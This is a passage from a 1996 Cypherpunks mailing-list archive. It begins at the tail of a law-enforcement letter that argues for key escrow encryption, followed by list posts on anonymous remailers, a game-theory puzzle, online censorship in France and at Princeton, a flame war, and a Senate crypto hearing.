promote public safety, not defeat it.  Key escrow encryption is that
beneficial and balanced technological solution.

American manufacturers that employ encryption in their hardware and
software products are undoubtedly the technology leaders in the world.
American industry has the capability of meeting all of society's basic
needs, including public safety and national security, and we, as
responsible government leaders, should be sending a clear signal to
industry encouraging them to do so.  Key escrow encryption is "win-win"
technology for societies worldwide.  I know you agree that it would be
irresponsible for the United States, as the world's technology leader, to
move towards the adoption of a national policy that would knowingly and
consciously unleash on a widespread basis unbreakable, non-key escrow
encryption products that put citizens in the U.S. and worldwide at risk.

Unfortunately, in recent months, the nearly exclusive focus of the public
discussion concerning the encryption issue has been on its commercial
aspects, particularly with regard to removing export controls.  This
narrow focus ignores the very real threat that conventional, non-key
escrow encryption poses both domestically and internationally to public
safety.  We continue actively to seek industry's cooperation, assistance,
and great expertise in producing key escrow encryption products as a
critical part of an overall, balanced, and comprehensive encryption
policy that would logically include an appropriate relaxation of export
controls for key escrow products.

As for export controls, we have had ongoing discussions with industry,
and industry has articulated the view that export controls needlessly
hurt U.S. competitiveness overseas.  But once again we need to carefully
consider the facts and balance a number of competing interests.  Although
some strong encryption products can be found overseas, they are simply
not ubiquitous, and, as of yet, they have not become embedded in the
basic operating systems and applications found overseas.

Importantly, when the U.S. recently let it be known that it was
considering allowing the export of encryption stronger than that now
permitted, several of our close allies expressed strong concerns that we
would be flooding the global market with unbreakable cryptography,
increasing the likelihood of its use by criminal organizations and
terrorists throughout Europe and the world, and thereby imperiling the
public safety in their countries.  Ironically, the relaxation of export
controls in the U.S. may well lead to the imposition of import controls
overseas.  The international implications and likely reactions of foreign
governments to the U.S. unilaterally lifting such export controls must be
fully considered.

Given the fact that the use and availability of robust encryption is an
issue of concern internationally, it is important to understand what
steps other countries are taking to address these concerns.  Recently,
France, Russia and Israel have established domestic restrictions on the
import, manufacturer, sale and use of encryption products, as not to
endanger their public safety and national security.  The European Union
is moving towards the adoption of a key recovery-based key management
infrastructure similar to that proposed for use within the United States.
This plan, based upon the concept of using a "Trusted Third Party,"
allows for encryption keys to be escrowed with an independent but
non-governmental party, thus allowing for lawful government access to
such escrowed key pursuant to proper legal authority.

Lastly, we have heard the oft-repeated argument that the "genie is out of
the bottle," and that attempts to influence the future use of
cryptography are futile.  This is simply not true; and we strongly
disagree.  If strong, key escrow encryption products proliferates both
overseas and domestically which will not interoperate (at least in the
long-term) with non-key escrow products, then escrowed encryption
products will become the worldwide standard and will be used by almost
everyone, including the criminal elements, in countries participating in
the GII.  It is worth noting that we have never contended that a key
escrow regime, whether voluntarily or mandatorily implemented, would
prevent all criminals from obtaining non-key escrowed encryption
products.  But even criminals need to communicate with others nationally
and internationally, including not just their criminal confederates but
also legitimate organizations such as banks. Accessible, key escrow
encryption products clearly will be used by most if widely available,
inexpensive, easy to use, and interoperable worldwide.

In closing, if one considers the broad range of public safety
responsibilities that fall upon the law enforcement community, there is
only one responsible course of action that we as government leaders must
embark upon -- to promote socially#031#responsible encryption products,
products that contain robust cryptography but which also provide for
timely law enforcement access and decryption -- that is, key escrow
encryption.  The entire law enforcement community believes not only that
the removal of export controls for encryption products that are non#031#law
enforcement accessible is unwise, but that such an action would
jeopardize our national security and the interests and safety of
law-abiding citizens worldwide.

We look forward to working with you and your staff on this difficult
issue and would be pleased to answer any questions you might have.



_________________________________________________________________________
Subject: Freeh Testimony 7/25/96
_________________________________________________________________________
David Banisar (Banisar@epic.org)       * 202-544-9240 (tel)
Electronic Privacy Information Center * 202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301  *  HTTP://www.epic.org
Washington, DC 20003                *  ftp/gopher/wais cpsr.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P. J. Ponder" <ponder@freenet.tlh.fl.us>
Date: Fri, 26 Jul 1996 11:01:34 +0800
To: cypherpunks@toad.com
Subject: Re: Ross Anderson's Eternity Service
Message-ID: <Pine.SUN.3.91.960725175559.24658A-100000@fn2.freenet.tlh.fl.us>
MIME-Version: 1.0
Content-Type: text/plain


In response to Hal's questions...

I think the Eternity Service, as I understand the idea (altho I haven't 
read the paper yet), is valuable to society.  In some countries, the 
government may try to suppress views and information unpopular to them 
and the ES could help make the information available.  Sort of like Radio 
Free Internet.  This one use - helping people who may be living under 
repressive governments get access to more information - would make the 
service valuable.  

There is certainly a large risk to intellectual property holders, if people
used such a service to distribute copies of software, music, videos, or
whatever, to avoid paying royalties and etc.
--
pj

re the DES hack, has anyone asked Damien when the researchers go on 
vacation? ;^)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Fri, 26 Jul 1996 14:06:36 +0800
To: Jerome Tan <jti@i-manila.com.ph>
Subject: Re: Produce 7 Hertz Frequency
In-Reply-To: <01BB7ABB.F7A9E440@Jerome Tan>
Message-ID: <Pine.SUN.3.91.960725180951.8320A-100000@crl7.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Thu, 25 Jul 1996, Jerome Tan wrote:

> Does anyone know how to produce a 7 hertz frequency?

No, but hum a few bars and we'll fake it.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Erle Greer <vagab0nd@sd.cybernex.net>
Date: Fri, 26 Jul 1996 10:01:45 +0800
To: cypherpunks@toad.com
Subject: Re: Twenty Bank Robbers -- CLARIFICATION
Message-ID: <2.2.32.19960725231249.006b4c10@mail.sd.cybernex.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:13 PM 7/25/96 -0500, you wrote:
>Igor Chudov wrote:
>> 
>> Here's a puzzle for our game theorists.
>> 
>> Twenty cypherpunks robbed a bank. They took 20 million bucks. Here's
>> how they plan to split the money: they stay in line, and the first guy
>> suggests how to split the money. Then they vote on his suggestion. If
>> 50% or more vote for his proposal, his suggestion is adopted.
>> 
>> Otherwise they kill the  first robber and now it is the turn of guy #2
>> to make another splitting proposal. Same voting rules apply.
>> 
>> The question is, what will be the outcome? How will they split the
>> money, how many robbers will be dead, and so on?
>> 
>
>I forgot to say what the GOALS are. The goals of every individual
>cypherpunk are (in from highest to lowest priority): 
>
>1. Stay alive
>2. Get as much money as possible
>3. Keep as many cypherpunks alive as possible, all other things being equal.
>
>	- Igor.
>
OK, robber #1 secretly discusses with each other robber that if he votes for
#1, that they will split it.  All robbers thinking this, vote for #1.  #1
then leaves town with 20 million.
vagab0nd@sd.cybernex.net
http://ww2.sd.cybernex.net/~vagab0nd/index.html
Visit web page for public key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Erle Greer <vagab0nd@sd.cybernex.net>
Date: Fri, 26 Jul 1996 09:53:10 +0800
To: cypherpunks@toad.com
Subject: Re: Twenty Bank Robbers -- CLARIFICATION
Message-ID: <2.2.32.19960725232126.006e51bc@mail.sd.cybernex.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:13 PM 7/25/96 -0500, you wrote:
>Igor Chudov wrote:
>> 
>> Here's a puzzle for our game theorists.
>> 
>> Twenty cypherpunks robbed a bank. They took 20 million bucks. Here's
>> how they plan to split the money: they stay in line, and the first guy
>> suggests how to split the money. Then they vote on his suggestion. If
>> 50% or more vote for his proposal, his suggestion is adopted.
>> 
>> Otherwise they kill the  first robber and now it is the turn of guy #2
>> to make another splitting proposal. Same voting rules apply.
>> 
>> The question is, what will be the outcome? How will they split the
>> money, how many robbers will be dead, and so on?
>> 
>
>I forgot to say what the GOALS are. The goals of every individual
>cypherpunk are (in from highest to lowest priority): 
>
>1. Stay alive
>2. Get as much money as possible
>3. Keep as many cypherpunks alive as possible, all other things being equal.
>
>	- Igor.
>
Well, two wrong so far, here it is:
Nobody knew that robber#17 was Steven Segal under-cover.  #1 proposed an
even split, so Segal broke his neck.  The other 18, being CypherPunks, were
smart enough to make tracks.  One dead, Segal 20 million, and no lines
rehearsed.
vagab0nd@sd.cybernex.net
http://ww2.sd.cybernex.net/~vagab0nd/index.html
Visit web page for public key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Fri, 26 Jul 1996 14:32:31 +0800
To: hallam@Etna.ai.mit.edu
Subject: Re: LIMBAUGH ON TV
In-Reply-To: <9607260125.AA08079@Etna.ai.mit.edu>
Message-ID: <Pine.SUN.3.91.960725182916.8320F-100000@crl7.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Interestingly, Phill responded to my last message with both a
private one and a public one.  In the private one (which I 
mistakenly believed was sent to the list), he told me that he 
was declining the wager.  As his reasons, he mentioned that he 
was not as interested in money as I appeared to be.  To which I 
replied:

It's not about the money.  Phill knows that, I know that, and so
does everyone else.

He further chided that I could draw no other conclusions then
that he wasn't interested in the wager.  I responded:

Oh yes I can.  And fortunately, so can everyone else.  Better a 
live jackel than a dead lion, right? 

In Phill's recent public post he said:

> Actually the original reply I made was simply one of a number of 
> objections to what is a very silly argument. I could have equally
> answered that way had you actually proposed a duel or that we
> "step outside". It is a very silly mode of argument and desrves
> to be answered in the same manner (if at all).

Notice how Phil again proposes a straw man by making an implicit
analogy between trials by combat, and a wager, the outcome of
which would turn on the actual outcome of events forecast--in the
alternative--by Phil and myself.

> The essential humourless of your reply is indicated by your
> failure to realise that my conversion of your 25L into 2 cents
> was satirical.

Oh really?  Then how come you at first defended it with your
attempted face-saving "GBP" comment?

Really, Phill, have you know shame?


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Fri, 26 Jul 1996 11:57:30 +0800
To: tcmay@got.net (Timothy C. May)
Subject: RE: Schelling Points, Rights, and Game Theory--Part II
Message-ID: <9606258383.AA838345835@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


If crypto is going to become widespread, at some point it will need to enter the
mainstream consciousness. We have already discussed the issue of "getting the
word out" about GAK in comparison to video cameras in every home. "If people
understood the issue, they would never accept GAK..."

The stats on the average internet user are usually something like 85% male,
US$50K average income, 30-35 years old, Univeristy education. 

It may come as no suprise then that Internet users as a group could have life
experiences significantly different than a majority of the population.
Similarily, their views may also be in the minority. On the other hand, they do
hold a majority of the technological power. 

Revenge of the Nerds is one phrase that I have heard.

tcmay@got.net wrote:
>Even meant humorously (">;-)"), many of us would dispute the notion that >a
voluntarily-taken job is a "McJob." Frankly, working at a fast-food place
>is usually not a lifetime career, but is instead a [stepping stone]

And what or who guarantees that this later, better job exists. Much of what I
read today suggests that McJobs may become the norm for many.

>>jbugden@alis.com
>>As soon as those with power are not able to see a situation where they >>could
become like those without power, there will cease to be motivation >>to maintain
a "safety net" of rights or economic means to protect the >>"losers" of our
society.

>What are "those without power"?

Can you image working at a low paying job for your entire life. I personally
can't. I work hard and am doing well for myself. Like most of those here, crypto
would be a benefit for me. On the other hand, unlike most of the population, I
could join Mensa if I applied. My point: I'm not average and I suspect that
neither are you or most of those here. How do you make the cypherpunks agenda
(on the days that there is one ;-) of widespread concern to the average citizen?

>The best way to help the "losers" of our economy is to allow voluntary
>economic relationships to be formed.

I always thought that feudalism was a voluntary economic arrangement. The
vassals pledged allegiance and offered their labour while the feudal lord
pledged protection. Here is where Phil could give better examples.

If we are not prepared to maintain some lowest common denominator (a.k.a. safety
net), what will keep our individual freedoms intact if the concerns of the
"average" citizen drift unchecked towards simple survival?

I'm having a hell of a time getting my e-mail read because I'm too busy shooting
at the food scavengers. They killed my dog!

James







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joey Grasty" <jgrasty@gate.net>
Date: Fri, 26 Jul 1996 11:27:15 +0800
To: Sam Quigley <cypherpunks@toad.com
Subject: Re: remailer network/winsock remailers
Message-ID: <199607260008.UAA29844@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


Sam wrote:

> 
> Hi,
> 
> I've been unsubscribed from the list for a while, and only recently 
> rejopined, so this issue may well have been addressed in my absence.  If 
> not, though, here:
> 
> It occurs to me that, with the invention of the winsock remailers, we 
> have the potential to establish a very widespread and distributed network 
> of part-time remailers.  Specifically, it seems like there are a lot of 
> users who are only connected to the internet for short periods (PPP/SLIP) 
> or who only have full control over their machines for short periods.  
> These computers could not normally be used to run remailers as mail 
> would bounce when the computer/remailer software is down.
> 

Actually, the way the WinSock Remailer works is that the user's ISP spools
the mail and the remailer fetches it from the mail spool via the POP3
protocol.  Thus, as long as the mail spool does not overflow, messages
will not be lost.

As I develop the remailer, one of the features I'm adding is the ability
of the remailer to fetch only the messages with valid remail headers and
leave the remaining messages in the mail spool.  In this way, the 
mail spool is shared between the user and the remailer.  The only 
disadvantage is that all of the improperly formatted messages end up
in the user's mailbox.  An annoyance.

Another feature I'm adding is the ability to remail outgoing messages
through another remailer to hide the origin of the message.  This is to
hide the presence of the remailer or to provide a discardable account that
takes all the heat for spams, harrassment, etc.  Thus, a limited stealth 
capability is achieved.  A third feature is to accept inputs from a 
message pool, say alt.anonymous.messages, and remail them through another
remailer.  These are both attempts to increase the number of available
remailers and to develop some way to make remailers more resistant to
governments and other speedbumps on the internet.

Regards,

--
Joey Grasty
jgrasty@gate.net [home -- encryption, privacy, RKBA and other hopeless causes]
jgrasty@pts.mot.com [work -- designing pagers]
"Anyone who considers arithmetical methods of producing random digits is,
of course, in a state of sin." -- John Von Neumann
PGP = A7 CC 31 E4 7E A3 36 13  93 F4 C9 06 89 51 F5 A7




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@prairienet.org>
Date: Fri, 26 Jul 1996 15:12:30 +0800
To: ichudov@algebra.com
Subject: Re: Twenty Bank Robbers -- CLARIFICATION
Message-ID: <199607260111.UAA24805@bluestem.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain

-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: ichudov@algebra.com, cypherpunks@toad.com
Date: Thu Jul 25 20:12:45 1996
> 
> I forgot to say what the GOALS are. The goals of every individual
> cypherpunk are (in from highest to lowest priority): 
> 
> 1. Stay alive
> 2. Get as much money as possible
> 3. Keep as many cypherpunks alive as possible, all other things being
>  equal.

Well, the existence of "3" changes the problem entirely, as does
a system of prioritization.  Under these rules, Robber 1 would
propose an even split, eleven ways, and it would probably be
accepted.  That keeps a majority alive, and a majority get
some money (~2M each).  Without that, I'd tend to concur
with the other answers (19 & 20 each get $10M).

If we have to actually give a damn about each other...  :)


dave



- ---- David E. Smith  POB 324  Cape Girardeau MO USA 63702
dsmith@prairienet.org   http://www.prairienet.org/~dsmith
send mail of 'send pgp-key' subject for my PGP public key
"I'm only a social smoker, just a few packs a day really"

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Automagically signed with Pronto Secure for Windows.

iQEVAwUBMfgbozVTwUKWHSsJAQE+jQf+OwCOcoyX9nyMO1ihLr/Jzzqr4c+FXDLl
xWsAGKtr9Qr7afzCxeYRMjN5w5wGhSpXcNLa9oXgPlGRV0L2tH9vPvLifHWzzv7K
nvOQIC8mBK6O7rbHY8koD6E32D1BQE6SiTRVo3b3L7HOceCIxeT40RvEQfhDKj7B
RFaWehB4s1Aw1IdMh2rnIFpwY/vLDRx8/q8vXy6mAugOJmAvdoaeGQfbrKLIWSE0
D3X8F3O7fjQ3dda9oEE3xVhsJoRwuQ/Hcbk2eqrIomeLWSqeQO/OQl/vNHkNMAmX
MrkdHNYlXZRhtwHS3mKfcli+iekFLKzXRpyhurUN8g3Ni14Q8I6BSQ==
=eaX7
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jerome Tan <jti@i-manila.com.ph>
Date: Fri, 26 Jul 1996 11:17:16 +0800
To: "'cypherpunks@toad.com>
Subject: Produce 7 Hertz Frequency
Message-ID: <01BB7ABB.F7A9E440@Jerome Tan>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know how to produce a 7 hertz frequency?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Fri, 26 Jul 1996 13:35:52 +0800
To: Sam Quigley <poodge@econ.Berkeley.EDU>
Subject: Re: remailer network/winsock remailers
In-Reply-To: <Pine.SUN.3.91.960725110229.10878A-100000@quesnay.Berkeley.EDU>
Message-ID: <Pine.LNX.3.94.960725202628.397A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 25 Jul 1996, Sam Quigley wrote:

> It occurs to me that, with the invention of the winsock remailers, we 
> have the potential to establish a very widespread and distributed network 
> of part-time remailers.  Specifically, it seems like there are a lot of 
> users who are only connected to the internet for short periods (PPP/SLIP) 
> or who only have full control over their machines for short periods.  
> These computers could not normally be used to run remailers as mail 
> would bounce when the computer/remailer software is down.
> 
> If there were some sort of central registry where winsock (or other 
> non-permanent) remailers could announce their ability/inability to bounce 
> mail, email could be forwarded through these temporary remailers on a 
> dynamic basis.

Rather than using a central registry, this could be accomplished by using
plan files, mailbots, or, for people who don't have Unix shell access, dynamic
web pages.  This would make the remailer network much more robust should the
central registry be down.  I think that running ephemeral remailers would be
very useful if remailer software was configured to use them properly.  Also,
this would be useful for people who may have Unix shell access, but are not
allowed to run remailer software.

- -- Mark

PGP encrypted mail prefered
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/  


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMfgSGrZc+sv5siulAQGMxQP8C4lX6M/BmCsj/wQgl2uIx1Let7mb3gkI
AQFUkqTCHu/wihjBMrwmf0IIjv31Lkx1EAOoQFUN3KECoyN1EJGOLeLnWRQU9coH
LDjtuEsq4yxXxzq5/TtlSyEs8hgcdkDH8XsrN8QFd8axsmfNGLoBEtRigxCPEKP5
PZQ8BwlLbwc=
=VUPL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Fri, 26 Jul 1996 14:36:22 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: INTERESTING ADS
Message-ID: <Pine.SUN.3.91.960725201631.16186A-100000@crl14.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Today while thumbing through POLICE CHIEF magazine, I saw some
ads that have at least peripheral Cypherpunk interest.  Two were
for mobile communications software/hardware.  One even had a Web
page (though when I browsed it with lynx, there wasn't anything
to see).  Both give direct access to NCIC, NLETS, motor vehicle
records, local police databases, etc.  They both make a point of
saying they offer encrypted links.  In the words of one, "And
unlike conventional radio communications, all transmissions are
totally secure and unavailable to eavesdropping perpetrators AND
INQUIRING REPORTERS."  (My emphasis added.)

Cerulean	http://www.cerulean.com		508-460-4000

Premier MDT	800-966-7722 for brochure and free demo disk.
                                                   ^^^^^^^^^
The other ad was for computerized polygraph equipment.  It looks
like a laptop with input units for respiration, galvanic skin
response and blood pressure.  It uses something called the "Johns 
Hopkins Polyscore Analysis Algorithm.  US$5,700.

Axciton Systems	800-460-2645


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Fri, 26 Jul 1996 15:57:14 +0800
To: cypherpunks@toad.com
Subject: Princeton University muzzles students
Message-ID: <v01510101ae1dd364c4f2@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain




Date: Thu, 25 Jul 1996 20:33:38 -0500
To: fight-censorship+@andrew.cmu.edu
From: declan@well.com (Declan McCullagh)
Subject: Princeton University muzzles students, from HotWired
Sender: owner-fight-censorship@vorlon.mit.edu

Kudos to Brock for writing about Princeton University's attempt to
muzzle student online speech -- by citing IRS regulations.

Sure, Princeton isn't bound by First Amendment strictures since it's
not a state university and there is no state action. Nevertheless, it
should abide by the fundamental and long-standing principles of
academic freedom. Especially as a supposedly leading institution of
higher education, Princeton should stand head and shoulders above the
rest in fighting for free expression on its campus. To its shame,
it didn't.

The university attorneys should have at least read the two relevant IRS
revenue rulings (they didn't) before announcing such a restrictive
policy. And this isn't the first overbroad censorial policy that
Princeton has on the books. Carl Kadie comments on another one at:
  gopher://gopher.eff.org:70/00/CAF/policies/princeton.edu.critique
The Justice on Campus Project (http://joc.mit.edu/) has similar info.

When Princeton administrators claimed they followed the letter of the
law, in truth they used the law as an excuse to muzzle their students.

-Declan

-----------------

Read the full article at:
  http://www.netizen.com/netizen/96/30/campaign_dispatch3a.html

HotWired
The Netizen

Poison Ivy
Campaign Dispatch
by Brock N. Meeks
Washington, DC, 24 July


   Princeton University is apparently prohibiting students from
   exercising their First Amendment rights by going after folks who set
   up Web pages in support of presidential candidates, Dispatch has
   learned.

   Princeton launched its preemptory strike against free speech on 19
   July in a statement issued by its general counsel's office, which
   warns that a violation of the school's policy against politicking
   "will result in appropriate disciplinary action."

[...]

   Small problem: the IRS disagrees. Although there is no direct IRS
   ruling involving the use of a university's computer resources by its
   faculty, staff, or students to set up political Web pages, agency
   spokesman Wilson Fadely said there are two previous rulings "that may
   apply." The first deals with a student newspaper that directly
   endorsed one candidate for office over another. Despite the fact that
   the newspaper was published with university resources, "that was
   deemed not to be intervention," Fadely said.

[...]

   So where does Princeton get off riding its tax-exempt hobby horse as a
   de facto means to trample free speech? "No comment at this time," said
   Howard Ende, a Princeton attorney and co-author of the 19 July
   statement. When informed of the IRS rulings, Ende's reply was an
   enigmatic, "Oh, really."

[...]

   The one saving grace of the scenario is the perverse pleasure one can
   take in realizing that an elitist Ivy League school is so
   anal-retentive that it makes the IRS look reasonable. Go figure....






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Fri, 26 Jul 1996 14:26:13 +0800
To: cypherpunks@toad.com
Subject: www.anonymizer.com
Message-ID: <199607260353.UAA25540@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I had occasion to try www.anonymizer.com recently, and noticed
that it does not make SSL connections to other Web servers, nor
does it seem to accept them from the user.

Is there some technical reason for this?  If I wish to grep the
Web without my browsing habits becoming known to someone
monitoring my Net connection, https://www.anonymizer.com with 128
bit encryption would probably be a good thing to connect to.

I realize that the anonymizer does perform its stated function
quite nicely, namely that of preventing Web sites from collecting
information on people who visit them.  It just seems that this
additional functionality would be useful and not particularly
difficult to implement.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Fri, 26 Jul 1996 15:39:59 +0800
To: cypherpunks@toad.com
Subject: Cyber Rights Non! -- French Net-Censorship
Message-ID: <v01510103ae1dd8a901de@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain






Date: Thu, 25 Jul 1996 20:38:22 -0500
To: fight-censorship-announce@vorlon.mit.edu
From: declan@well.com (Declan McCullagh)
Subject: FC: Cyber Rights Non! -- French Net-Censorship
Sender: owner-fight-censorship-announce@vorlon.mit.edu

Attached is a portion of the lead article from today's HotWired on the
French government's net-censorship.

I'm pleased to say I just received word from a French correspondent that
the French "Conseil Constitutionnel" has blocked the part of the law
creating "Le Conseil SupÈrieur de la TÈlÈmatique" to decide what should be
blocked online.

(From what I've been able to gather, that court reviews laws to ensure
they're constitutional. On June 27, the Conseil heard arguments from
senators that the law violated articles of the French constitution.)

I have more on other international net-censorship attempts at:
  http://www.eff.org/pub/Global/Dispatches/
  http://www.cs.cmu.edu/~declan/international/

-Declan

-----------------------------------

Read the full article at:
  http://www.netizen.com/netizen/

HotWired
The Netizen

Cyber Rights Non!
by Jerome Thorel
Paris, 24 July

   Early last month, at a time of day when typical netsurfers are just
   hitting their mouse-clicking stride - around 3:30 in the morning - the
   French Senate voted on the final version of the new Telecommunications
   Regulation Act. A little-remarked section of the act, introduced as an
   amendment a few days before, represents the French legislature's first
   plunge into the digital ocean. It creates a kind of administrative
   oversight of Internet speech, Web sites, and online services. The
   law's effect is to create a council - le Conseil SupÈrieur de la
   TÈlÈmatique (CST) - to dictate or arbitrate guidelines regarding
   Internet content.

   It turned out, however, that the move by Telecommunications Minister
   FranÁois Fillon, sponsor of the French Telecom Act, was a little
   hasty. France had been shaken this spring by two investigations into
   pedophilia and Holocaust revisionism (both considered crimes in
   France) on the Internet.

   For months, Fillon had promised French Internet service providers that
   they would no longer bear responsibility for the content they
   transmit. The law does settle that question. But no one imagined that
   this guarantee would include as its condition the creation of the CST.
   To be safe from indictment, ISPs will be obliged to follow CST's
   guidelines - a policy typical of France's strong tradition of
   centralized administration.

[...]

   The French Net-regulation bill became law on 7 June - the same week
   that US federal judges declared the Communications Decency Act
   unconstitutional....

[...]

   Jerome Thorel, a Paris-based freelance reporter, writes frequently
   about technology and society. Andy Oram, in Cambridge, Massachusetts,
   contributed to this article.



-------------------------------------------------------------------------
fight-censorship is archived at http://fight-censorship.dementia.org/top/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eli+@gs160.sp.cs.cmu.edu
Date: Fri, 26 Jul 1996 12:46:41 +0800
To: cypherpunks@toad.com
Subject: Re: Twenty Bank Robbers -- Game theory:)
In-Reply-To: <+cmu.andrew.internet.cypherpunks+Ely0=Q200UfA410Gpl@andrew.cmu.edu>
Message-ID: <199607260111.SAA11897@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Hal Finney writes:
>I think the best way to approach this problem is to first try to solve
>it assuming there are only two robbers rather than 20.

Right.  Of course, you're implicitly assuming not only that this bunch
of bank robbers is rational, but that they're familiar with
mathematical induction.  :->

--
   Eli Brandt
   eli+@cs.cmu.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Fri, 26 Jul 1996 16:25:56 +0800
To: hallam@Etna.ai.mit.edu
Subject: Re: LIMBAUGH ON TV
In-Reply-To: <9607260343.AA08244@Etna.ai.mit.edu>
Message-ID: <Pine.SUN.3.91.960725204730.16186D-100000@crl14.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Thu, 25 Jul 1996 hallam@Etna.ai.mit.edu wrote:

> ...Since you can't take a hint and your arguments are now
> tiresome rather than amusing I'll tell it to you straight:

But I have made no arguments.  I have merely proposed a wager.
 
> As with Rush I don't have the slightest respect for your mode
> of argument.

Again, no argument was offered only a wager.  (Phill's respect
for my "mode of arguing" is certainly irrelevant to me as I
imagine it is to the bulk of readers of this list.)

> You attempt to introduce "proof by wager" as a valid form of
> argument.

This straw man was previously addressed.  No one but Phill has
suggested that wagers are a form of proof.  (If you can quote me
as suggesting otherwise, Phill, I'd be happy to explain to you
where you've gotten it wrong.)

> You introduce irrelevant factors such whether Rush is richer
> than I am,...

Apparently, Phill has lost track of which member of his enemies
list made which statements.  I, of course, never mentioned Rush's
wealth one way or the other.

> In short your arguments

I made none.  Phill should check his facts.

> are remarkably similar to those of your hero Rush,

Rush is not my hero. I never said he was.  Phill should check his 
facts.

> fatuous, invalid logic, irrelevant facts and gratuitous insults.
> I think you are a fool,

Res ipsa loquitur.

> I think that Rush is a fool and I don't consider that I need
> prove anything to you.

True, but without meaning to, Phill has proven quite a lot about
himself right here in front of god and everybody.  It ain't a
pretty picture is it?


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Fri, 26 Jul 1996 16:13:53 +0800
To: cypherpunks@toad.com
Subject: Fireworks expected, missed at Senate crypto hearing
Message-ID: <v01510106ae1ddb99b2af@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain






Date: Thu, 25 Jul 1996 21:05:31 -0500
To: fight-censorship+@andrew.cmu.edu
From: declan@well.com (Declan McCullagh)
Subject: Fireworks expected, missed at Senate crypto hearing
Sender: owner-fight-censorship@vorlon.mit.edu
Precedence: bulk

Contrary to the Reuters report excerpted below, there weren't any fireworks
at today's ProCODE crypto hearing before the full Senate Commerce committee
-- at least during the first panel when the spooks testified. (I skipped
out before the second, which had industry folks.)

Just more of the same, though we heard less about child pornographers and
more about terrorists. And Sen. Slate Gorton (R-Wash) jumped on the
committee staff for leaning too far *away* from national security interests
in their summary of the legislation.

Most amusing point: Sen. Larry Pressler waved a copy of the floppy with the
